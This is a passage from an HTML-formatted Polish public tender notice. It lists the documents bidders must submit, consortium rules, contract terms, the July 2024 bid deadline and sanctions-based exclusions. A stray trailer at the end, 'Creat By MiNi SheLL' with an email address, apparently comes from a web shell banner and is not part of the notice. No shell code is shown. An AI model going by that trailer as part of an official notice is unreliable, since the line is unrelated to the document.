w art. 118 PZP. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oświadczenia i dokumenty składane wraz z ofertą:<br/>1) Wypełniony Formularz ofertowy, stanowiący Załącznik nr 1 do SWZ.<br/>2) Do oferty należy dołączyć aktualne dokumenty potwierdzające status prawny wykonawcy, np. odpis z właściwego rejestru<br/>lub z centralnej ewidencji i informacji o działalności gospodarczej. Oferta nie musi zawierać tych dokumentów w przypadku<br/>wskazania przez wykonawcę, że są one dostępne w formie elektronicznej pod określonymi adresami internetowymi<br/>ogólnodostępnych i bezpłatnych baz danych.<br/>Upoważnienie osób podpisujących ofertę musi bezpośrednio wynikać z w/w dokumentów. Oznacza to, że w przypadku jeżeli<br/>upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny wykonawcy, do oferty należy dołączyć<br/>stosowne pełnomocnictwo w formie oryginału lub kserokopii potwierdzonej notarialnie, ustanowione do reprezentowania<br/>Wykonawcy/ów ubiegającego/ych się o udzielenie zamówienia publicznego.<br/>3) Oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 125<br/>ust. 1 PZP, w zakresie wskazanym przez Zamawiającego – wypełniony Załącznik nr 2 do SWZ stanowiący oświadczenie<br/>dotyczące odpowiednio:<br/>a) Wykonawcy;<br/>b) każdego z Wykonawców wspólnie ubiegających się o zamówienie;<br/>c) podmiotów udostępniających zasoby, czyli podmiotów, na zasoby których powołuje się wykonawca w celu spełnienia<br/>warunków udziału w postępowaniu, o których mowa w Dziale VI SWZ oraz przesłanek wykluczenia z postępowania, o<br/>których mowa w art. 108 ust. 1 PZP (Dział VII, pkt. 1 SWZ).<br/>4) Pełnomocnictwo ustanowione do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>publicznego (jeżeli dotyczy).<br/>W przypadku składania oferty wspólnej przez kilku przedsiębiorców (tzw. konsorcjum) wspólnicy muszą ustanowić<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/>zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane przez osoby upoważnione do składania<br/>oświadczeń woli każdego ze wspólników.<br/>5) Zobowiązania podmiotów udostępniających zasoby (jeżeli dotyczy), na które wykonawca będzie się powoływał w celu<br/>spełniania warunków udziału w postępowaniu, o których mowa w Dziale VI SWZ. Zgodnie z art. 118 ust. 3 PZP Wykonawca<br/>musi złożyć wraz z ofertą zobowiązania w/w podmiotów do oddania mu do dyspozycji tych zasobów na potrzeby realizacji<br/>zamówienia albo inne podmiotowe środki dowodowe potwierdzające, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów.<br/>Zgodnie z art. 118 ust. 4 PZP zobowiązanie podmiotu udostępniającego zasoby, którego wzór stanowi Załącznik nr 3 do<br/>SWZ, musi potwierdzać, że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty<br/>dostęp do tych zasobów oraz musi określać w szczególności:<br/>a) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby<br/>przy wykonywaniu zamówienia;<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje<br/>roboty budowlane lub usługi, których wskazane zdolności dotyczą. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku składania oferty wspólnej przez kilku przedsiębiorców (tzw. konsorcjum) wspólnicy muszą ustanowić<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/>zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane przez osoby upoważnione do składania<br/>oświadczeń woli każdego ze wspólników. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zakres zmian umowy został określony w projekcie umowy, stanowiącym Załącznik nr 7 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-30 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem zakładki &#34;oferty/wnioski&#34; dostępnej na platformie ezamówienia pod adresem: https://ezamowienia.gov.pl/ w szczegółach postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-30 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę na podstawie art. 7ust. 1 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego (Dz. U. z 2023r. poz. 129), zwaną dalej „ustawą sankcyjną”, który:<br/>1) jest wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ww. ustawy;<br/>2) jest beneficjentem rzeczywistym Wykonawcy w rozumieniu ustawy z dnia 1 marca 2018r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ww. ustawy;<br/>3) jest jednostką dominującą Wykonawcy w rozumieniu art. 3 ust. 1 pkt. 37 ustawy z dnia 29 września 1994r. o rachunkowości (Dz. U. z 2023r. poz.. 120), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ww. ustawy Wykluczenie Wykonawcy, o którym mowa w art. 7 ust. 1 „ustawy sankcyjnej” nastąpi na okres trwania<br/>okoliczności określonych w art. 7 ust. 1 „ustawy sankcyjnej”.<br/>Osoba lub podmiot podlegające wykluczeniu na podstawie art. 7 ust. 1 ustawy sankcyjnej, które w okresie tego wykluczenia<br/>ubiegają się o udzielenie zamówienia publicznego lub biorą udział w postępowaniu o udzielenie zamówienia publicznego, podlegają karze pieniężnej, nakładanej przez Prezesa Urzędu Zamówień Publicznych, w drodze decyzji, w wysokości do 20 000 000 zł.

Creat By MiNi SheLL
Email: jattceo@gmail.com